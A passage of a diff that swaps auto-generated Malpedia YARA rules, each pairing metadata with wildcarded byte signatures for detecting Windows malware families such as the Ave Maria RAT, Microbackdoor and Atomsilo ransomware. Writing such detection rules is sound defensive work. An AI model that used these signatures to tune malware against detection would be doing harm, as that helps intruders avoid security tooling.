- $sequence_15 = { 43 85ff 0f851fffffff 5f } - $sequence_16 = { 6a00 ffb42424200000 e8???????? 8b8c2418200000 } - $sequence_17 = { 8b0495a0bf4200 f644082801 7421 57 e8???????? } - $sequence_18 = { 46 85f6 7410 83fe01 75a0 } - $sequence_19 = { 0fb611 0fb6c0 eb17 81fa00010000 7313 8a87ccb14200 } - $sequence_20 = { 8b742414 85f6 7553 32c0 } - $sequence_21 = { 57 81fb00020000 0f8daa000000 6800080000 } - $sequence_22 = { 8b4218 a3???????? 8b4a08 890d???????? 8b420c } - $sequence_23 = { 33c0 668906 8b7c2414 8d5f20 } - $sequence_24 = { e8???????? 8b404c 83b8a800000000 7512 8b04bda0bf4200 807c302900 7504 } - $sequence_25 = { 88048d93404300 88048d923c4300 84d2 7412 } - $sequence_26 = { 8b7004 8b38 4e 8bce e8???????? } - $sequence_27 = { 8b4d08 85c9 7512 e8???????? 5e } - $sequence_28 = { 5f 894df0 8b34cd58224100 8b4d08 6a5a 2bce } + $sequence_0 = { 0001 0200 0103 0303 } + $sequence_1 = { 0001 7708 00f3 7608 } + $sequence_2 = { 0002 7408 00f7 7308 } + $sequence_3 = { 001a 0c05 003c0c 05004e0c05 } + $sequence_4 = { 0008 7408 0002 7408 } + $sequence_5 = { c1e104 0fb6d0 8b84248c000000 c1e204 8baa406f4f00 } + $sequence_6 = { 000f 7708 0001 7708 } + $sequence_7 = { c7405420164600 eb5e 57 e8???????? } + $sequence_8 = { 3bf7 72e3 5b 5f b001 5e } + $sequence_9 = { 0010 740b 0021 740b } + $sequence_10 = { 0fb6c0 330c85c0fe4e00 0fb6c3 8b5f28 330c85c0fa4e00 33f1 8d0411 } + $sequence_11 = { 8b75fc 8b7df4 c60301 eb06 8b75fc 8b7df4 } + $sequence_12 = { 894c2448 7436 8b442410 8d90c8795000 } + $sequence_13 = { 330c8520dd4e00 8b442414 c1e818 330c8520d94e00 8b44242c 0fb6c0 } + $sequence_14 = { 6a35 eb2b 8bfb eb04 8b442414 ff742420 } + $sequence_15 = { 000b 8605???????? 007885 0500788605 } condition: - 7 of them and filesize <843776 + 7 of them and filesize <6578176 } -rule MALPEDIA_Win_Pteranodon_Auto : FILE +rule MALPEDIA_Win_Ave_Maria_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "547312ac-3667-5c97-9fc9-daff4d88f305" + id = "410b5f16-91ac-5311-b6ab-598dd1954c39" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pteranodon_auto.yar#L1-L173" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ave_maria_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "5752ea7e57aaa9393a80bd68b7b77d472dc2c58ad73fb0c8d5639c2a359a3d60" + logic_hash = "d6a2fe1f05fe69e9ea5ce04e4093200d3e962df5b8f3c4c00fc93efedbc85567" score = 75 quality = 75 tags = "FILE" @@ -169973,38 +172829,32 @@ rule MALPEDIA_Win_Pteranodon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 394614 7320 51 50 8bce } - $sequence_1 = { 8d8dc0f8ffff e9???????? 8d8dc0f8ffff e9???????? 8d8dc0f8ffff e9???????? 8d8d08f9ffff } - $sequence_2 = { 59 83e03f 59 6bc838 8b04b5e0874300 03c1 } - $sequence_3 = { 8d45f0 50 ff15???????? 83f802 7541 8d4df0 e8???????? } - $sequence_4 = { 8b04f5b49b0210 5f 5e 5b 5d } - $sequence_5 = { ffd0 0fb7f0 8bcf 8b07 8b4008 ffd0 } - $sequence_6 = { c7869800000038c90210 c7460401000000 8b4dfc 5f 5e 33cd } - $sequence_7 = { 0f8490000000 53 6a00 56 e8???????? } - $sequence_8 = { 2bd0 d1fa 8d7902 668b01 83c102 } - $sequence_9 = { 8d8d78f8ffff c645fc1e e8???????? 8b851cf9ffff 83f810 7213 40 } - $sequence_10 = { 660f28aa802c4300 660f54e5 660f58fe 660f58fc 660f59c8 f20f59d8 } - $sequence_11 = { 3bc1 7419 85c0 b001 } - $sequence_12 = { 1bc0 23c1 83c008 5d c3 8b04c5849f4200 } - $sequence_13 = { c3 8b04c58cbf0210 5d c3 } - $sequence_14 = { c645fc0b 8d8df0f8ffff e8???????? 8d8d20f9ffff c645fc0c 03ce } - $sequence_15 = { 53 e8???????? 83c404 8945ec 53 8bd8 } + $sequence_0 = { 8b07 ff740610 8d4614 50 8d45f8 50 } + $sequence_1 = { 52 8b08 6a01 50 ff510c 85c0 74c1 } + $sequence_2 = { 6a0a 03c1 59 8bf8 f3a5 8d4d30 } + $sequence_3 = { 0f57c0 c745e015000000 50 8d4de0 0f1145e8 e8???????? 8bc8 } + $sequence_4 = { 803800 7509 33c0 5b c3 33c0 40 } + $sequence_5 = { 8bc7 99 2bc1 8bcf 1bd6 52 50 } + $sequence_6 = { ff500c 8b06 68???????? ff37 8b08 } + $sequence_7 = { 51 54 8bce e8???????? 8b4d08 e8???????? 83c410 } + $sequence_8 = { 300431 41 3bcf 7ced 5f 8bc6 5e } + $sequence_9 = { 83ec18 53 8bd9 56 57 895df8 } condition: - 7 of them and filesize <499712 + 7 of them and filesize <237568 } -rule MALPEDIA_Win_Unidentified_107_Auto : FILE +rule MALPEDIA_Win_Microbackdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3e7e44ff-0f02-5267-8346-e5f949ff1ff2" + id = "32768709-e0c4-568e-99b5-4d92498e8c97" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_107" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_107_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.microbackdoor_auto.yar#L1-L174" license_url = "N/A" - logic_hash = "36a3784a29d5434d0fa9e9c5acdfc21d8509c8e92eeaa689801f442b7fb11fdb" + logic_hash = "d87bae84a1434eb391a7ebc0d4af12aee586692c39928b7bf8d060b1c97f49c6" score = 75 quality = 75 tags = "FILE" @@ -170018,32 +172868,38 @@ rule MALPEDIA_Win_Unidentified_107_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4139d9 75d8 4c89e1 e8???????? } - $sequence_1 = { 48897008 4c89e1 ff15???????? 488b05???????? 4c89e1 48891d???????? } - $sequence_2 = { 0f83d6fdffff 4c8b35???????? 8b7304 448b2b 4883c308 4c01f6 44032e } - $sequence_3 = { 034208 4839c1 7214 4883c228 } - $sequence_4 = { 0f8584000000 4c8b3e 4929c7 4901cf } - $sequence_5 = { e8???????? 4c89e1 ff15???????? 31c0 4883c428 } - $sequence_6 = { 8b15???????? 85d2 0f8ea1feffff 488b35???????? 31db 4c8d65fc } - $sequence_7 = { e8???????? 4989c7 48b9ca0e99c700000000 e8???????? 4883c464 488b4c2408 } - $sequence_8 = { 4183fc01 0f85a9feffff 8b05???????? 85c0 0f8e9bfeffff 83e801 488b1d???????? } - $sequence_9 = { 4c89442418 4c894c2420 4883ec64 48c7c10f15af3d } + $sequence_0 = { 0fb74510 50 ff750c ff15???????? } + $sequence_1 = { ffd7 eb06 ff15???????? 8bc6 eb06 } + $sequence_2 = { 488bcd 418bdc 4d8bfc e8???????? 85db 755b 488d842478020000 } + $sequence_3 = { 8939 488d4c2430 41b89c000000 e8???????? 488d4c2430 } + $sequence_4 = { 74df 8d047506000000 50 6a40 ff15???????? 8bc8 894d0c } + $sequence_5 = { 85c0 751d 837c247001 7516 395c2478 7610 488b4c2430 } + $sequence_6 = { 4885db 7417 0fb7445ffe 6683f85c 7406 6683f82f } + $sequence_7 = { 498bce 33f6 e8???????? 85ed } + $sequence_8 = { 498bce 4489bc2488000000 453bc4 4c897c2420 } + $sequence_9 = { 56 6a00 6a00 68???????? ff75f8 ff15???????? 85c0 } + $sequence_10 = { ff15???????? 8d4336 50 6a40 ff15???????? 8bf8 } + $sequence_11 = { 8bf8 897dd4 85ff 7498 837df800 b9???????? 8b5dfc } + $sequence_12 = { ff15???????? 488bd8 4885c0 7512 ff15???????? 488d0d503e0000 } + $sequence_13 = { 8bf8 e9???????? 33c0 40 e9???????? ff15???????? } + $sequence_14 = { 83feff 743b 8b4d0c ff7510 894df4 ff15???????? 668945f2 } + $sequence_15 = { 85c0 0f84bb010000 66833d????????00 0f84ad010000 } condition: - 7 of them and filesize <254976 + 7 of them and filesize <123904 } -rule MALPEDIA_Win_Geminiduke_Auto : FILE +rule MALPEDIA_Win_Sarhust_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7571eb47-e456-5ff2-b8bf-b1898ddd8358" + id = "50274b48-711c-5f29-acdb-11078c70fee8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.geminiduke_auto.yar#L1-L156" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sarhust_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "e55c638d52ba8f741e7b2025242401b1531659829b54a8df50edaef39f23c4d8" + logic_hash = "0160e7f1d6d7f85de80fabf97a5a855a2c32446045510933894141374e273156" score = 75 quality = 75 tags = "FILE" @@ -170057,37 +172913,32 @@ rule MALPEDIA_Win_Geminiduke_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 57 8b7c2410 8b442414 } - $sequence_1 = { 8b7c2410 8b442414 8b4c2418 f3aa } - $sequence_2 = { 6a00 68???????? e8???????? 83c404 50 6801000080 ff15???????? } - $sequence_3 = { 8b4c2418 f3aa 5f 59 } - $sequence_4 = { 03459c 03c8 894ddc 8b45fc } - $sequence_5 = { 034590 8b8d70ffffff c1e907 8b9570ffffff } - $sequence_6 = { 034584 8b8d64ffffff c1e907 8b9564ffffff c1e219 0bca } - $sequence_7 = { 034590 03c8 894dd0 8b45f8 } - $sequence_8 = { f7f3 66894706 8bc2 c1e010 668b4604 33d2 f7f3 } - $sequence_9 = { 0fb6f8 57 6a20 56 e8???????? 83c40c } - $sequence_10 = { 337704 33e8 8b442410 c1ee12 83e601 33ee } - $sequence_11 = { 33d2 f7f3 66894704 8bc2 } - $sequence_12 = { e8???????? d1ee 33f3 c1ee03 337704 33e8 } - $sequence_13 = { 0430 8ad1 80ea0a 80fa05 7705 } - $sequence_14 = { 8a442404 8ac8 80e961 80f919 7703 b001 } + $sequence_0 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff } + $sequence_1 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? } + $sequence_2 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 } + $sequence_3 = { eb08 8b4520 8b4d0c 8908 } + $sequence_4 = { 6801000080 ff15???????? 85c0 7408 ff15???????? } + $sequence_5 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? } + $sequence_6 = { e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? } + $sequence_7 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 } + $sequence_8 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 } + $sequence_9 = { 8d8d4cffffff e8???????? 6a00 ff15???????? } condition: - 7 of them and filesize <327680 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Targetcompany_Auto : FILE +rule MALPEDIA_Win_Atomsilo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e6fff5d7-7001-551f-9dad-753a10f6e88e" + id = "5c5abdc6-8981-5d86-b9f4-d4db3c6db3a6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.targetcompany_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atomsilo_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "a6f3e9a1f1d0d374d374e6c7006eb751526bddf3371b115cfe046f8accd1d439" + logic_hash = "12073cc9a4e235a243c621f25e39a1bc781a5d45de9a635e40dc44153d51bb08" score = 75 quality = 75 tags = "FILE" @@ -170101,32 +172952,32 @@ rule MALPEDIA_Win_Targetcompany_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 85c0 7475 fe85a7fdffff 80bda7fdffff0c } - $sequence_1 = { 53 ff15???????? ff75e8 ff15???????? ff75e0 ff15???????? 3975f0 } - $sequence_2 = { eb43 b900100000 3bc1 733a 53 51 } - $sequence_3 = { 83c424 33cd 33c0 5f e8???????? c9 c3 } - $sequence_4 = { 813d????????a9aaaa0a 722b 68???????? 8d4dd4 } - $sequence_5 = { e8???????? 57 6a0c 5a 8bce 8d45e0 e8???????? } - $sequence_6 = { 83ec40 53 56 33f6 57 8d5dc4 } - $sequence_7 = { 50 8d45b0 50 e8???????? 8d45b0 50 8d85c0feffff } - $sequence_8 = { bf???????? 8d75e8 e8???????? 8b1d???????? 8d75f0 } - $sequence_9 = { 8945ec e8???????? 53 6a01 8d758c e8???????? 53 } + $sequence_0 = { e8???????? 90 488d054b810900 488903 488d0571780900 48894308 48c74338ffffffff } + $sequence_1 = { 4403e8 498b17 48638c24a0000000 4803ca 49890f 483bca 731c } + $sequence_2 = { 4d8bc4 488bd7 488d8d50010000 e8???????? b930000000 e8???????? 488bd8 } + $sequence_3 = { 488b7dd0 4885c9 741d 488d51ff 488d14d7 0f1f440000 48833a00 } + $sequence_4 = { 0409 83f052 8844245d 8b442450 040a 83f045 8844245e } + $sequence_5 = { 488d05dd6c0700 488907 488bc7 0f104318 488b5c2430 f30f7f4718 4883c420 } + $sequence_6 = { 4156 4883ec50 488b5830 498bf9 498bf0 4c8bf2 4c8be1 } + $sequence_7 = { 488d15e7b60500 0fb60c0a c1e103 4863c9 488d1546720900 33440a03 8944243c } + $sequence_8 = { 0f94c0 480106 ebc0 488b7c2438 4c8b8424f0000000 4c8b9c24c8000000 4c8b9424d0000000 } + $sequence_9 = { 4883ec28 83792801 8b4228 7423 83f801 740f e8???????? } condition: - 7 of them and filesize <328704 + 7 of them and filesize <1785856 } -rule MALPEDIA_Win_Rarog_Auto : FILE +rule MALPEDIA_Win_Downdelph_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "af269765-c756-5cee-8964-0f35e326beb2" + id = "9652ab66-5cde-50a7-9cf0-943c75b27c39" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rarog_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.downdelph_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "90be509347cdd78e80ac954224309fb579e700a948cbf60773c02796ec820629" + logic_hash = "800e73805e0adaa63996d81ee2c529d701882055ee15e51dd88ba5a4c6bc228a" score = 75 quality = 75 tags = "FILE" @@ -170140,32 +172991,32 @@ rule MALPEDIA_Win_Rarog_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8db5c8fdffff e9???????? 8b542408 8d420c 8b8ab8fdffff } - $sequence_1 = { 83781410 7202 8b00 8b35???????? 53 53 50 } - $sequence_2 = { 8d8d28fdffff e8???????? 53 53 68???????? 8d85e8feffff 50 } - $sequence_3 = { 50 68???????? 51 e8???????? 83c40c 83ec1c c645fc21 } - $sequence_4 = { 8b75ac 46 56 53 ff15???????? 89459c } - $sequence_5 = { 68???????? 50 8d4dd0 e8???????? 59 59 8d8d9cfeffff } - $sequence_6 = { ff7508 6a00 6a01 ff15???????? 8bf0 85f6 7409 } - $sequence_7 = { 57 83c8ff e8???????? 53 68???????? 83c8ff } - $sequence_8 = { 59 8b7508 8d34f5501d4300 391e 7404 8bc7 eb6d } - $sequence_9 = { c1e002 c1eb06 0bc3 8a80c0b64200 884102 0fbe443202 83e03f } + $sequence_0 = { 85c9 0f84d2feffff 53 56 57 89c3 } + $sequence_1 = { 83c4f8 8bf2 33d2 8bdc } + $sequence_2 = { e8???????? 48 50 8bc3 b901000000 8b15???????? } + $sequence_3 = { 8d55d8 e8???????? 8b5708 88041a } + $sequence_4 = { 53 56 33db 899de0fbffff } + $sequence_5 = { 0f8cd6020000 46 33ff 8b15???????? 8bc7 e8???????? } + $sequence_6 = { 8b45fc e8???????? 50 8b45f0 } + $sequence_7 = { 2bd3 2bd7 8bfa 85ff 7d02 33ff } + $sequence_8 = { 68???????? 64ff32 648922 6a00 6800000080 } + $sequence_9 = { ff05???????? 7544 b8???????? e8???????? b8???????? } condition: - 7 of them and filesize <598016 + 7 of them and filesize <172032 } -rule MALPEDIA_Win_Mofksys_Auto : FILE +rule MALPEDIA_Win_Webc2_Cson_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d4eb461a-0f9d-55f8-ba8b-2ce33ab04b0d" + id = "9e77cd9b-5577-55ec-9bc9-fce8ae6111d5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mofksys_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_cson_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "79cea3cada5c4d8bb821159689e5cf75c88595dc32d8f5768a4b2ed694d76584" + logic_hash = "7c0e799e7902791c334e5b7573181538432e1af2060bac92fa55c2a280799f66" score = 75 quality = 75 tags = "FILE" @@ -170179,32 +173030,32 @@ rule MALPEDIA_Win_Mofksys_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 8bd0 8d4de8 ffd6 8d8d60ffffff } - $sequence_1 = { 894dd4 c745fc07000000 8b55d8 52 e8???????? ff15???????? 8b45d4 } - $sequence_2 = { 83c40c c745fca1000000 ba???????? 8d4dc0 ff15???????? 8d4dc0 51 } - $sequence_3 = { f7de 3bf0 7209 ff15???????? 8b4dc0 8b4118 0fafc6 } - $sequence_4 = { ff15???????? 83c410 c745fc65000000 ba???????? 8d4dcc ff15???????? a1???????? } - $sequence_5 = { ff15???????? 8bd0 8d8d7cfcffff ffd6 50 ffd7 } - $sequence_6 = { a1???????? 8b4de4 50 51 ffd7 8bd0 8d4da8 } - $sequence_7 = { 3bc3 7d12 68e0000000 68???????? 56 50 } - $sequence_8 = { 83c201 0f80b2080000 52 8b45d0 50 68???????? } - $sequence_9 = { e8???????? 8d4ddc ff15???????? c745fc0f000000 68???????? 6a00 ff15???????? } + $sequence_0 = { e8???????? 8d85f0feffff 50 e8???????? 6a1e 8db5f6feffff 59 } + $sequence_1 = { be???????? 8dbd74ffffff 6a0a f3a5 a4 be???????? 56 } + $sequence_2 = { 50 e8???????? 59 59 ff7508 8d85acfcffff 50 } + $sequence_3 = { e8???????? 59 59 68???????? ff15???????? 53 bf???????? } + $sequence_4 = { 83c410 85ff 743f 85c0 743b 2bc7 } + $sequence_5 = { 8bec 81ec54030000 53 56 8b35???????? 57 33db } + $sequence_6 = { 83f803 0f859c010000 53 53 53 53 } + $sequence_7 = { 8d7d81 885d80 f3ab 66ab aa 6a0f 33c0 } + $sequence_8 = { 8bec 81ec3c060000 53 56 be04010000 } + $sequence_9 = { 5e 5b c9 c20400 c605????????01 be00900100 6800040000 } condition: - 7 of them and filesize <401408 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Woodyrat_Auto : FILE +rule MALPEDIA_Win_Tinyloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ce77dd1e-7a7f-526f-b26a-f53840a84ce1" + id = "0d2fde25-ff7d-54ba-a2fe-e20fb626403d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woodyrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.woodyrat_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinyloader_auto.yar#L1-L168" license_url = "N/A" - logic_hash = "f0e3660df6e09cfccf9351d956d7545670538be69e20bfd57639d1e54207defb" + logic_hash = "544c827393b5f9a7c28206644605d3c060467a9b94170d9210a95463f44b3867" score = 75 quality = 75 tags = "FILE" @@ -170218,32 +173069,38 @@ rule MALPEDIA_Win_Woodyrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b75ec 8985a4ebffff ffb5bcebffff e8???????? 8b7de4 83c404 837de800 } - $sequence_1 = { 8d4e4c 54 6a00 e8???????? 8bc8 e8???????? 8d4dd8 } - $sequence_2 = { 8d4710 50 8d45cc 50 e8???????? 84c0 7403 } - $sequence_3 = { e8???????? c645fc03 8b55cc 83fa10 722c 8b4db8 42 } - $sequence_4 = { 8b4328 8bd8 3bfb 742d 8b0f 8b01 ff5008 } - $sequence_5 = { 8bc8 83781410 7202 8b08 83781004 753b 8b01 } - $sequence_6 = { 83c408 8d4508 6a00 84db 7428 837d1c08 6800000002 } - $sequence_7 = { 50 e8???????? 8b7d80 83c404 e9???????? c645fc00 } - $sequence_8 = { 7607 be55555515 eb07 03f1 3bf2 0f42f2 } - $sequence_9 = { 745d 40 50 e8???????? 8bf0 8b45c8 40 } + $sequence_0 = { 90 8bbb97114000 90 8938 90 } + $sequence_1 = { 6689c8 90 6a40 6800300000 6800800200 6a00 } + $sequence_2 = { 039d58080000 6a00 6800040000 53 ffb5b8050000 ff15???????? } + $sequence_3 = { 31db 90 31c9 90 } + $sequence_4 = { 8b5510 01da 8b12 8b4500 } + $sequence_5 = { 81c300040000 6a00 ff33 ff7500 ffb5b8050000 ff15???????? 83f8ff } + $sequence_6 = { 8b4500 83c008 c70000000000 c7855808000000000000 8b5d00 039d58080000 } + $sequence_7 = { 83bd580800000c 7302 ebc3 8b5d00 } + $sequence_8 = { ff15???????? 8985b8050000 6832a00000 ff15???????? 8b9da8050000 66894302 66c7030200 } + $sequence_9 = { 90 89c6 90 0500400100 } + $sequence_10 = { ffb5a0050000 6802020000 ff15???????? 6a06 6a01 6a02 ff15???????? } + $sequence_11 = { c705????????00010000 68???????? 68???????? ff15???????? 68???????? ff15???????? } + $sequence_12 = { 6a10 ffb5a8050000 ffb5b8050000 ff15???????? } + $sequence_13 = { 81fb04030000 730c 90 83c004 } + $sequence_14 = { 31c9 90 3108 90 813890909090 } + $sequence_15 = { 637574 6541 0050ff 15???????? c705????????00010000 68???????? 68???????? } condition: - 7 of them and filesize <785408 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Qadars_Auto : FILE +rule MALPEDIA_Win_Anchormtea_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9fe67d17-52ae-502a-8e0c-394e495a69f5" + id = "1f1be8a6-a512-5951-b4a5-8a59e9561b7d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.qadars_auto.yar#L1-L161" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.anchormtea_auto.yar#L1-L156" license_url = "N/A" - logic_hash = "3d2af7ca0745a690ff7b2f329cb25b898b4988f89dfff4953c93c63e52507d01" + logic_hash = "36b7e20db6ab94edc928176040f9980c01a0a26295c603a430e96744ecfde5c2" score = 75 quality = 75 tags = "FILE" @@ -170257,40 +173114,39 @@ rule MALPEDIA_Win_Qadars_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48 c7048100000000 75f4 8b06 } - $sequence_1 = { 8b4d10 8939 5f 8bc6 5e 5b } - $sequence_2 = { 747a 8b45fc 3b4604 7650 33c9 } - $sequence_3 = { 33c9 8908 894804 53 8b5d0c 8b4308 56 } - $sequence_4 = { 83e940 0f8589040000 bb???????? 8b701c } - $sequence_5 = { 33c0 6808020000 50 8d8de6fdffff 51 668985e4fdffff e8???????? } - $sequence_6 = { 894608 85c0 75ee eb32 85db } - $sequence_7 = { ff470c 8d4dc4 8955d0 e8???????? 8b75f4 } - $sequence_8 = { 6a00 8d4df4 51 6a04 8d55f8 } - $sequence_9 = { 6a01 6a08 ff15???????? 83c408 } - $sequence_10 = { 6a01 8b55fc 52 ff15???????? 83c408 } - $sequence_11 = { 83c40c 6805010000 8d8df8feffff 51 } - $sequence_12 = { 51 8b55f0 52 ff15???????? 83c40c } - $sequence_13 = { 83c408 6a09 8d4dc4 51 8b5518 } - $sequence_14 = { 83c408 837de000 740c 8b4de0 } - $sequence_15 = { 83c408 837df800 747f 8b4df8 } + $sequence_0 = { e9???????? f7d8 1bc0 83e002 } + $sequence_1 = { 33c0 6689047e eb14 51 } + $sequence_2 = { 83f81f 0f87f3080000 52 51 e8???????? } + $sequence_3 = { 7409 488bcf ff15???????? 33f6 4c8b7c2448 4c8b642460 } + $sequence_4 = { 488905???????? 488d055b7e0200 488905???????? 488d05897d0200 48890d???????? 48890d???????? } + $sequence_5 = { 899d1cffffff ffd7 50 ffd6 } + $sequence_6 = { 8b9580f7ffff 89856cf7ffff 8b85acf7ffff 2bc7 898d5cf7ffff 89bd64f7ffff } + $sequence_7 = { 4983ff10 4c0f43f7 4c8b6c2470 4983fd0b 725f 4f8d242e } + $sequence_8 = { 51 57 8d4dd8 e8???????? 33d2 895588 90 } + $sequence_9 = { 4883c0f8 4883f81f 772e e8???????? 8bc6 } + $sequence_10 = { 488d9510020000 488bcb ff15???????? 413b7624 } + $sequence_11 = { 4a8d3c39 488bc6 482bc2 4869d88c090000 } + $sequence_12 = { 33ff 488945d0 488d45e0 4533c9 4889442448 4533c0 } + $sequence_13 = { 740e 6a40 68???????? 68???????? ffd7 8d45f8 } + $sequence_14 = { 7514 3b8598fdffff 1bc0 238598fdffff } condition: - 7 of them and filesize <630784 + 7 of them and filesize <839680 } -rule MALPEDIA_Win_Darkbit_Auto : FILE +rule MALPEDIA_Win_Graphdrop_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "58b27aad-7d48-54be-9cff-6269fdf4ce6e" + id = "9b2ea7f1-3511-52b3-a5e3-7dff660f4219" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkbit_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphdrop" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphdrop_auto.yar#L1-L112" license_url = "N/A" - logic_hash = "06c0013c639973d9f2d79cd394915657a8e01f1fe7c56128c97a4b11c48d29ab" + logic_hash = "f69680c5241d19c09af86db48aaa89e34bb562d83e95c226a91b7e2e978f1c7f" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -170302,34 +173158,34 @@ rule MALPEDIA_Win_Darkbit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 48898424f0140000 48899c2498020000 488b0d???????? 48898c2478100000 488d05c1742500 90 } - $sequence_1 = { eb23 4889c7 488b8c24d0180000 e8???????? 488d7810 488b8424c8180000 6690 } - $sequence_2 = { e8???????? 4889842410010000 48899c2418070000 488b442460 48c7c3feffffff e8???????? 4889842470010000 } - $sequence_3 = { eb11 488d7818 488b8c24f0110000 e8???????? 488b8c24e8030000 48894810 833d????????00 } - $sequence_4 = { 833d????????00 7515 488b8c24a81e0000 488908 488905???????? 90 eb1c } - 